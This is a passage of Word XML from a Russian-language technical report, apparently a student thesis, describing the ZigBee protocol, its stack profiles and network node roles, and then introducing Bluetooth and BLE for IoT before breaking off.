      <w:bookmarkStart w:id="8" w:name="_Toc503990998"/>
      <w:r>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r w:rsidR="005C07FB" w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Протокол </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C07FB" w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="005C07FB" w:rsidRPr="00B47356" w:rsidRDefault="00C14C68" w:rsidP="00C07525">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> — спецификация сетевых протоколов верхнего уровня — уровня приложений APS (англ. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>support</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>sublayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>) и сетевого уровня NWK, — использующих сервисы нижних уровней — уровня управления доступом к среде MAC и физического уровня PHY, регламентированных стандартом IEEE 802.15.4.</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> и IEEE 802.15.4 описывают беспроводные персональные вычислительные сети (WPAN). Спецификация </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> ориентирована на приложения, требующие гарантированной безопасной передачи данных при относительно небольших скоростях и возможности длительной работы сетевых устройств от автономных источников питания</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>(батарей).</w:t>
      </w:r>
      <w:r w:rsidR="003E7C76" w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E7C76" w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E7C76" w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> изначально разрабатывался для создания надежных распределенных сетей датчиков и управляющих устройств с невысокими скоростями передачи данных. В этих технологиях реализована поддержка сетевой топологии «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E7C76" w:rsidRPr="000C799E">
        <w:t>mesh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E7C76" w:rsidRPr="000C799E">
        <w:t xml:space="preserve">», спящих и мобильных узлов, а также узлов, которые обеспечивают работу алгоритмов ретрансляции и самовосстановления. </w:t>
      </w:r>
      <w:r w:rsidR="003E7C76" w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>Скорость 250 кбит/с — это максимальная пропускная способность сети. Полезная скорость будет порядка 30-40 кбит/с в пределах соседних узлов и 5-25 кбит/с при использовании ретрансляции.</w:t>
      </w:r>
      <w:r w:rsidR="00B47356" w:rsidRPr="00B47356">
        <w:t>[13]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C14C68" w:rsidRPr="000C799E" w:rsidRDefault="00C14C68" w:rsidP="00C07525"/>
    <w:p w:rsidR="009369F2" w:rsidRPr="00B47356" w:rsidRDefault="009369F2" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Так как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> может активироваться (то есть переходить от спящего режима к активному) за 15 миллисекунд или меньше, задержка отклика устройства может быть очень низкой, особенно по сравнению с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>, для которого задержка, образующаяся при переходе от спящего режима к</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>активному, обычно достигает трёх секунд.</w:t>
      </w:r>
      <w:r w:rsidR="00B47356" w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Так как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> большую часть времени находится в спящем режиме, уровень потребления энергии может быть очень низким, благодаря чему достигается длительная работа от батарей.</w:t>
      </w:r>
      <w:r w:rsidR="00B47356" w:rsidRPr="00B47356">
        <w:t>[14]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009369F2" w:rsidRPr="000C799E" w:rsidRDefault="009369F2" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Первый выпуск стека сейчас известен</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">под названием </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> 2004. Стек 2004 года сейчас более или менее вышел из употребления. Реализация</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> 2007 в настоящее время является текущей, она содержит два профиля стека, профиль стека № 1 (который называют просто </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">) для домашнего и мелкого коммерческого использования, и профиль стека № 2 (который называют </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Pro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Pro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> предлагает больше функций, таких как широковещание, маршрутизацию вида «многие-к-одному» и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">высокую безопасность с использованием симметричного ключа (SKKE), в то время как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> (профиль стека № 1) занимает меньше места в оперативной и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Flash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>-памяти. Оба профиля позволяют развернуть полномасштабную сеть с ячеистой топологией</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">и работают со всеми профилями приложений </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009369F2" w:rsidRPr="000C799E" w:rsidRDefault="009369F2" w:rsidP="00C07525">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> 2007 полностью совместим с</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">устройствами </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> 2006. Устройство </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> 2007 может подключаться и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">работать с сетью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> 2006, и наоборот. При этом приложения, которые запускаются на устройствах,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>работают одинаково, независимо от реализации профиля стека.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009369F2" w:rsidRPr="000C799E" w:rsidRDefault="009369F2" w:rsidP="00C07525"/>
    <w:p w:rsidR="005C07FB" w:rsidRPr="000C799E" w:rsidRDefault="00F57840" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc503990999"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.2.1 </w:t>
      </w:r>
      <w:r w:rsidR="003E7C76" w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Типовая структура сети </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E7C76" w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003E7C76" w:rsidRDefault="003E7C76" w:rsidP="00B47356">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B78618C" wp14:editId="6EE4E760">
            <wp:extent cx="5940425" cy="28016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01620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C04B7" w:rsidRPr="005C04B7" w:rsidRDefault="005C04B7" w:rsidP="005C04B7">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A66CA1">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00731F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Топология </w:t>
      </w:r>
      <w:r>
        <w:t>ZigBee</w:t>
      </w:r>
      <w:r w:rsidRPr="00731F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> сети</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C417A7" w:rsidRPr="000C799E" w:rsidRDefault="00C417A7" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Координатор</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> — это узел, организовавший сеть. Именно он выбирает политику безопасности сети, разрешает или запрещает подключение к сети новых устройств, а также при наличии помех в радиоэфире инициирует процесс перевода всех устройств в сети на другой частотный канал.</w:t>
      </w:r>
      <w:r w:rsidR="005C04B7">
        <w:t xml:space="preserve"> (Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A66CA1">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005C04B7">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C417A7" w:rsidRPr="000C799E" w:rsidRDefault="00C417A7" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Роутер</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> — это узел, который имеет стационарное питание и следовательно может постоянно участвовать в работе сети. Координатор также является роутером. На узлах этого типа лежит ответственность по маршрутизации сетевого трафика. Роутеры постоянно поддерживают специальные таблицы маршрутизации, которые используются для прокладки оптимального маршрута и поиска нового, если вдруг какое-либо устройство вышло из строя. Например, роутерами в сети </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> могут быть умные розетки, блоки управления осветительными приборами или любое другое устройство, которое имеет подключение к сети электропитания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E7C76" w:rsidRPr="00B47356" w:rsidRDefault="00C417A7" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Конечное устройство</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> — это устройство, которое подключается к сети через родительский узел – роутер или координатор – и не участвует в маршрутизации трафика. Все общение с сетью для них ограничивается передачей пакетов на «родительский» узел либо считыванием поступивших </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">данных с него же. «Родителем» для таких устройств может быть любой роутер или координатор. Конечные устройства большую часть времени находятся в спящем режиме и отправляют управляющее или информационное сообщение обычно только по определенному событию (нажатие кнопки выключателя, открытие окна или двери). Это позволяет им долго сохранять энергию встроенного источника питания. Примером конечных устройств в сетях </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> могут быть беспроводные выключатели, управляющие работой светильников и работающие от батареек, датчики протечки воды, датчики открытия/закрытия дверей. Стоит сказать, что конечные устройства делятся на 3 категории, каждая из которых имеет свои особенности, но о них в следующей части.</w:t>
      </w:r>
      <w:r w:rsidR="00B47356" w:rsidRPr="00B47356">
        <w:t>[12]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A05F4F" w:rsidRPr="000C799E" w:rsidRDefault="00F57840" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc503991000"/>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="006635B6">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A05F4F" w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00806F99" w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> и BLE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00A05F4F" w:rsidRPr="000C799E" w:rsidRDefault="00A05F4F" w:rsidP="00C07525">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> — производственная спецификация беспроводных персональных сетей (PAN). Спецификация</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">разработана компанией </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Ericsson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">, а позднее оформлена группой </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Special</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Interest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Group</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> (SIG). SIG была официально </w:t>
      </w:r>
      <w:r w:rsidR="00806F99" w:rsidRPr="000C799E">
        <w:t>зарегистрирована</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> 20 мая 1999 года. Она была основана такими компаниями, как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Sony</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Ericsson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">, IBM, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Intel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Toshiba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Nokia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>, а затем очень много других ведущих информационных и телекоммуникационных компаний вступили в неё как ассоциированные члены.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A05F4F" w:rsidRPr="000C799E" w:rsidRDefault="00A05F4F" w:rsidP="00C07525"/>
    <w:p w:rsidR="00A05F4F" w:rsidRPr="00B47356" w:rsidRDefault="00A05F4F" w:rsidP="00C07525">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> обеспечивает обмен информацией между такими устройствами как мобильные телефоны, ноутбуки, карманные и персональные компьютеры, принтеры, цифровые фотоаппараты и наушники на надёжной, недорогой, повсеместно доступной радиочастоте, которая используется для ближней связи. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> позволяет этим устройствам обращаться друг к другу, когда они находятся в радиусе от 10 до 100 метров, в одном помещении и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>даже в разных его частях или за стеной.</w:t>
      </w:r>
      <w:r w:rsidR="00B47356" w:rsidRPr="00B47356">
        <w:t>[15]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00806F99" w:rsidRPr="000C799E" w:rsidRDefault="00806F99" w:rsidP="00C07525"/>
    <w:p w:rsidR="00806F99" w:rsidRPr="00F455FD" w:rsidRDefault="00806F99" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Технология </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> все чаще используется в сфере интернета вещей. Часть этой технологии, именуемая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> LE (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Low</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Energy,она</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> же BLE) прямо позиционирует себя как идеальный выбор для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>IoT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> . Трудно не согласится. BLE уже умеет маршрутизировать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Internеt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> трафик, определять координаты в помещениях, подключать промышленные программируемые логические контроллеры, поддерживать WEB серверы, подключать весы, термометры, пульсометры, тонометры и массу других вещей на надёжной, недорогой, повсеместно доступной радиочастоте, которая используется для ближней связи. C BLE автоматически решается множество проблем присущих решениям с использованием </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>. Так же разрабатываются устройства с BLE, которые</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">смогут организовываться в MESH сети, по технологии схожей с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">. Это уже отражено в спецификации </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> 5.0.</w:t>
      </w:r>
      <w:r w:rsidR="00F455FD" w:rsidRPr="00F455FD">
        <w:t>[16]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A74D30" w:rsidRPr="000C799E" w:rsidRDefault="00F57840" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc503991001"/>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="006635B6">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="00A74D30" w:rsidRPr="000C799E">
        <w:t>Обзор стека протокол</w:t>
      </w:r>
      <w:r w:rsidR="003A6F8A" w:rsidRPr="000C799E">
        <w:t xml:space="preserve">а </w:t>
      </w:r>
      <w:r w:rsidR="003A6F8A" w:rsidRPr="000C799E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00A74D30" w:rsidRPr="000C799E">
        <w:t>LE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00806F99" w:rsidRDefault="00A74D30" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Как и в классическом </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
